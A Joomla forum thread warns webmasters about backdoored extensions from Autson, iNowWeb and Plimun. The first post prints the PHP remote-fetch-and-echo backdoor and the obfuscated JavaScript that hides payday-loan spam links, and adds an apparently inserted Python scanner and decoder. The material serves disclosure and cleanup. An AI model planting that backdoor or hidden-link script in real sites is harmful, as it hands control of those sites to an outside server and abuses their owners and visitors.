
Remove extensions from Autson/iNowWeb/Plimun - Malicious !!

Posted: Sat Mar 23, 2013 12:45 am
by alphaprodigy
This is a notice to all developers / webmasters. Check your site to see if you have any extensions installed from Autson.com AKA iNowWeb.com AKA Plimun.com (possibly more).

Extensions from this developer/company contain malicious code that fetches a file from their server and inserts it into your site. Right now they are inserting hidden backlinks to their Payday L0ans website, which is terrible in itself as this practice can affect YOUR Google rankings, but they also have the ability to insert whatever code they like and can do whatever they like to your website. This is a huge security vulnerability. As such, the extensions have been removed from the JED, but they are still on tens of thousands of websites.

The most popular vulnerable extensions are:

- Autson Skitter Slideshow (mod_AutsonSlideShow)
The malicious code is located in the "tmpl" folder, in the php file(s).

- Share This for Joomla! (mod_JoomlaShare This)
The malicious code is located in mod_JoomlaShare This.php.

- VirtueMart Advanced Search (mod_virtuemart_advsearch)
The malicious code is located in mod_virtuemart_advsearch.php.

- AddThis For Joomla (mod_AddThisForJoomla)
The malicious code is located in mod_AddThisForJoomla.php.

- Plimun Nivo Slider (mod_PlimunNivoSlider)
The malicious code is located in the "tmpl" folder, in the php file(s).

The hidden backlinks are being inserted via the following code:

<?php 
$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);
echo $credit;
?>
or

<?php 
$credit=file_get_contents('http:// www.autson.com/p.php?i='.$path);
echo $credit;
?>
etc. The file on their server that the code accesses has many different names, but the code will resemble the code above. The code is usually near the end of the php file.


This is what that code is inserting into the site:

<script language="JavaScript">
function dnnViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896','778787',
'949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}dnnViewState();
</script>

<p class="dnn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
or

<script language="JavaScript">
function nemoViewState()
{
var a=0,m,v,t,z,x=new Array('9091968376','8887918192818786347374918784939277359287883421333333338896',
'877886888787','949990793917947998942577939317'),l=x.length;while(++a<=l){m=x[l-a];
t=z='';
for(v=0;v<m.length;){t+=m.charAt(v++);
if(t.length==2){z+=String.fromCharCode(parseInt(t)+25-l+a);
t='';}}x[l-a]=z;}document.write('<'+x[0]+' '+x[4]+'>.'+x[2]+'{'+x[1]+'}</'+x[0]+'>');}nemoViewState();
</script>

<p class="nemonn">By PDPRELUK <a href="http://THEIR-PAYDAY-SITE" title="Payday L0an">payday l0ans uk</a></p>
Additional extensions from these developers that are possibly vulnerable as well:

iNowWeb.com (author: Sharif Mamdouh):
- iNowSlider (mod_iNowSlider)
- iNow Twitter Widget (mod_TwitterWidget)
- BrainyQuote for Joomla! (mod_JoomlaBrainyQuote)
- Quotes By keyWord! (mod_JoomlaQuotes)
- iNow Wikio (mod_JoomlaWikio)
- iNow Twitter (mod_TwitterForJoomla)
- QuickJump for Joomla! (mod_quickjump)

Autson.com (author: xing):
- FaceBook Slider
- Twitter Friends & Followers
- Flying Tweets
- Autson Twitter Search
- Twitter Quote
- FaceBook Show

Plimun.com:
- Plimun Twitter Ticker
- Twitter Show

I've managed to gather a list of around 20,000 vulnerable websites that have installed extensions from this developer and are displayed hidden backlinks that are inserted by the extensions. The list is by no means comprehensive, but I believe it has a large portion of the vulnerable websites. You can see the list here: http://pastebin.com/tWfiKcrr

So what can we do to stop these spammers/hackers?

1. Remove the extensions from your or your clients' websites (or just remove the malicious code).
2. Do our best to reach out to the webmasters of the sites in the pastebin list above.
3. Report their domain names for spam/abuse to . They are all registered at Namecheap. The more people that complain, the more likely Namecheap will act. The domain names are:

autson.com , inowweb.com , plimun.com
The actions of developers like this adversely affect the entire Joomla community and we must do something to stop it.
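For webmasters who want to check their own installs rather than grep by hand, the following Python script is an added example (not code from this thread or from any of the extensions) that does two things: it scans PHP files for the remote-fetch line shown above, using the three domain names from this post, and it decodes the two-digit encoding used by the injected dnnViewState()/nemoViewState() script so you can see what document.write() actually emits. The decoder is a direct transcription of the loop in the quoted script; the sample module file is constructed for the example and is not a real extension file.

```python
"""Triage helpers for the remote-fetch backdoor described in the first post.

Added example, not code from the thread. Two independent pieces:
  1. scan_php_source()/scan_tree(): flag PHP lines that fetch content from
     the vendor domains named in the post and, at lower severity, any other
     file_get_contents() of an http(s) URL so nothing similar is missed.
  2. decode_state_blob()/injected_markup(): reverse the two-digit encoding in
     the injected dnnViewState()/nemoViewState() script, so a responder can
     see what the script writes into the page.
"""
import re
import sys
from pathlib import Path

# Domains named in the post as the source of the fetched payload.
SUSPECT_DOMAINS = ("inowweb.com", "autson.com", "plimun.com")

# Matches the backdoor line shown in the post, e.g.
#   file_get_contents('http://www.inowweb.com/p.php?i='.$path)
# The \s* after the scheme tolerates the "http:// www." spelling in the post.
KNOWN_FETCH_RE = re.compile(
    r"file_get_contents\(\s*['\"]https?://\s*(?:www\.)?("
    + "|".join(re.escape(d) for d in SUSPECT_DOMAINS)
    + r")/",
    re.IGNORECASE,
)
# Any other remote fetch inside a module deserves a manual look.
GENERIC_FETCH_RE = re.compile(r"file_get_contents\(\s*['\"]https?://", re.IGNORECASE)


def scan_php_source(src: str, name: str = "<string>") -> list:
    """Return one finding dict per suspicious line of PHP source."""
    findings = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        m = KNOWN_FETCH_RE.search(line)
        if m:
            findings.append({"file": name, "line": lineno,
                             "severity": "known-malicious",
                             "domain": m.group(1).lower()})
        elif GENERIC_FETCH_RE.search(line):
            findings.append({"file": name, "line": lineno,
                             "severity": "review", "domain": None})
    return findings


def scan_tree(root: Path) -> list:
    """Scan every .php file below root (for example a Joomla modules/ directory)."""
    findings = []
    for path in sorted(root.rglob("*.php")):
        findings.extend(scan_php_source(path.read_text(errors="replace"), str(path)))
    return findings


def decode_state_blob(chunks: list) -> list:
    """Reverse the encoding used by the injected script.

    The script walks the array backwards (a = 1..l, element x[l-a]), splits each
    element into two-digit numbers and adds (25 - l + a) to each before turning
    it into a character. This is a transcription of that loop.
    """
    l = len(chunks)
    out = [""] * l
    for a in range(1, l + 1):
        m = chunks[l - a]
        shift = 25 - l + a
        out[l - a] = "".join(chr(int(m[i:i + 2]) + shift) for i in range(0, len(m), 2))
    return out


def injected_markup(chunks: list) -> str:
    """Rebuild the string the script passes to document.write()."""
    x = decode_state_blob(chunks)
    # The script references x[4] but the quoted arrays have four elements, so
    # JavaScript stringifies the missing slot as "undefined"; browsers ignore it.
    attr = x[4] if len(x) > 4 else "undefined"
    return f"<{x[0]} {attr}>.{x[2]}{{{x[1]}}}</{x[0]}>"


# Copied from the dnnViewState() script quoted in the post.
DNN_CHUNKS = [
    "9091968376",
    "8887918192818786347374918784939277359287883421333333338896",
    "778787",
    "949990793917947998942577939317",
]

# Constructed sample of a module file containing the backdoor line plus one
# unrelated remote fetch; not a real extension file.
SAMPLE_PHP = """<?php
defined('_JEXEC') or die;
$path = $_SERVER['HTTP_HOST'];
// ... normal module output ...
$credit=file_get_contents('http://www.inowweb.com/p.php?i='.$path);
echo $credit;
$feed = file_get_contents('https://example.org/feed.json');
?>
"""

if __name__ == "__main__":
    root = Path(sys.argv[1]) if len(sys.argv) > 1 else None
    results = scan_tree(root) if root else scan_php_source(SAMPLE_PHP, "sample.php")
    for f in results:
        print(f"{f['severity']:16} {f['file']}:{f['line']} {f['domain'] or ''}")
    print("injected markup:", injected_markup(DNN_CHUNKS))
```

Run it with the path to a site's modules directory to get a line-by-line list; with no argument it scans the constructed sample. Decoding the quoted array gives a style rule of the form `.dnn{position:absolute;top:-9999px}`, which is what pushes the "payday" paragraph off-screen so visitors never see the link while search engines still do.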

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Posted: Sat Mar 23, 2013 5:10 am
by mandville
It is actions like this that get a dev banned from the JED. This dev was banned long ago.

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Posted: Sat Mar 23, 2013 7:14 am
by alphaprodigy
Yes, the developer was banned, but it went unnoticed for so long that now there are over 20,000 infected websites out there. I made this thread to hopefully bring more attention to the vulnerable extensions mentioned above so that the affected webmasters can be alerted to the problem and act accordingly. I know it's unrealistic to reach every webmaster, but every little bit helps.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Wed Mar 27, 2013 3:12 pm
by delhidjinn
Thank you for this warning. Two of my most important websites were infected via the extension AddThis. I have gone ahead and removed this extension as well as the Facebook slider.

Much obliged to you for saving my websites.

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Posted: Wed Mar 27, 2013 3:21 pm
by Webdongle
alphaprodigy wrote:Yes, the developer was banned, but it went unnoticed for so long ...
There has been a change in JED management ... perhaps this new management is now starting to show how effective it is ? The fact that it took so long before any action was taken was due to the old JED management ?

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Wed Mar 27, 2013 4:21 pm
by mandville
Also to note that occasionally a developer will upload a clean extension to the JED for checking and then, once the hits start rolling in, upload a dodgy package to their website.

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Posted: Wed Mar 27, 2013 4:44 pm
by brian
Webdongle wrote:
alphaprodigy wrote:Yes, the developer was banned, but it went unnoticed for so long ...
There has been a change in JED management ... perhaps this new management is now starting to show how effective it is ? The fact that it took so long before any action was taken was due to the old JED management ?
The JED can only react to reports. I personally spotted this issue and reported it to the JED, who took action immediately.

Re: Remove extensions from Autson/iNowWeb/Plimun - Vulnerabl

Posted: Wed Mar 27, 2013 5:05 pm
by Webdongle
brian wrote:...
The JED can only react to reports. ...
I recall a post where it was stated that extensions were checked for malicious code in an extension before it was accepted ?

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Wed Mar 27, 2013 5:08 pm
by brian
Sadly it's not possible to ensure that the version uploaded is the same as the version that is available for download. Nor is it possible to ensure that every single update is checked. You only need to see how often the most popular extensions from nonumber are often to appreciate that it is impossible to check every single release.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Wed Mar 27, 2013 5:53 pm
by Webdongle
brian wrote:... Nor is it possible to ensure that every single update is checked. You only need to see how often the most popular extensions from nonumber are often to appreciate that it is impossible to check every single release.
That's a good point ... pity there are not more people checking.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Thu Mar 28, 2013 2:38 am
by delhidjinn
I have become economical in the use of Joomla extensions, especially since I upgraded to Joomla 2.5. The migration was a headache as many extensions either had been discontinued or the upgrade was not available.

Plus my most valuable site was hacked due to doorways in certain extensions. Even paid extensions.

Joomla is a robust platform. With almost a minimal use of extensions, I have brought my expectations down and do not opt for the fancy stuff immediately.

Still, even then I had been beguiled into believing that some extensions are okay, which it seems they are not.

Nowadays I am very strict in incorporating extensions in my website. Some extensions I cannot do without, and have to use them.

I believe, eventually in a few years time, Joomla would have most of the basic requirements of a website built in native.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Mon Apr 08, 2013 11:19 am
by jfdutoit
Wow, I'm quite surprised that someone would do so much effort to contact and inform website owners about these malicious extensions.

I received a random email from a certain Tom E informing me of Add-This, etc.

Although I'm grateful that he notified me, I'm surprised that someone would go to such great lengths to let me know. My website (ezywebsites.co.za) is one of the 20 000 mentioned in the first post.

Yet, as soon as I get a chance, I'll check all my clients.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Tue Apr 09, 2013 4:00 pm
by Vering
You have my greatest thanks, alphaprodigy. I've immediately removed the malicious code from the Autson Slideshow.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Tue Apr 09, 2013 11:11 pm
by suklamc
Additional Behaviour noticed with [spam] for Joomla! :

The extension was used/evaluated for use for website(s) by me/us, and some peculiar behaviour was noticed.

1> The above-mentioned extension used to load insecure code. (We accidentally discovered it when we enabled site-wide SSL/HTTPS a few months ago.) When LinkedIn (and maybe other social options) were selected, a nasty browser warning (for loading insecure content) used to be thrown up. The issue was not investigated further (it was easier to find an alternative extension).

2> Another aspect worth mentioning: the above-mentioned backlinks are not loaded in some configurations (but are definitely loaded when LinkedIn is selected), which suggests there may be more lines of code controlling the backlink's behaviour.

Hence I suggest you rephrase/remove "(or just remove the malicious code)", as this may give a false sense of security that the issue has been fixed by removing a few lines of code (and something else may get missed).

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Sun Apr 14, 2013 9:07 am
by luigipepe
I also received an email from someone at a gmail account warning me that my site was infected and pointing me to this thread. The code was there so I disabled and uninstalled the addthis extension that was causing the problem and the code is now gone. THANK YOU SO MUCH for letting me know, much appreciated!

Now does anyone know of a reliable free alternative to the addthis social sharing extension? This has put me off a little and I'm not sure what to choose anymore...

Luigi

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Tue Apr 16, 2013 10:07 am
by mark4740
Thanks for the email. I seem to have removed the script and deleted the plugin. It seems to only have been on my home page as I can't see it in any of the other page sources (I hope). Does anyone know a safe plugin for the twitter/facebook/google icons on my website so I can tweet/like/post new products I list?

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Tue Apr 16, 2013 10:02 pm
by mark4740
I'm surprised there have not been more comments on this. I have had the rogue plugin on my site for over 10 months; with over 20,000 sites affected I thought this topic would be bigger than it is?

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Tue Apr 16, 2013 11:35 pm
by mandville
mark4740 wrote: I'm surprised there have not been more comments on this. I have had the rogue plugin on my site for over 10 months; with over 20,000 sites affected I thought this topic would be bigger than it is?
You are relying on the belief that people feel compelled to come here and say "me2", "+1", "i owe you my first born".
The OP did their apparent civic duty informing people of the issue; this is not the proverbial field of dreams.
People downloaded and installed the extensions, got caught, got notified and hopefully removed it. End of most people's stories regarding this developer.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Sat Apr 20, 2013 3:36 am
by edirect
I would like to say thanks to whomever tipped me off. I sent them an email, but maybe they will see it here.

Anyway, thank you.

jw

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Sat Apr 27, 2013 4:06 pm
by techdoctor_gr
Thanks for the email. The script was removed when I deleted the plugin!

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Mon Feb 03, 2014 5:04 pm
by paulfoos
I got burned by this extension, and found out the hard way, had to search through my site for the vulnerability. I went to the vulnerable extensions (Live VEL) page and there is no listing for Autson slideshow. Joomla has almost no control over extensions, unlike other CMSs. I hope to get all my Joomla sites converted to Drupal soon.

Re: Remove extensions from Autson/iNowWeb/Plimun - Malicious

Posted: Mon Feb 03, 2014 6:22 pm
by mandville
paulfoos wrote: had to search through my site for the vulnerability.
With all due respect, please do not confuse "malicious" with "vulnerable".
paulfoos wrote: I went to the vulnerable extensions (Live VEL) page and there is no listing for Autson slideshow.
The extensions are listed there: http://vel.joomla.org/articles/844-spot ... sions.html Published on Tuesday, 27 August 2013

Quite often extensions downloaded from the dev's website have "extra" code not in the zip provided to the JED for checking.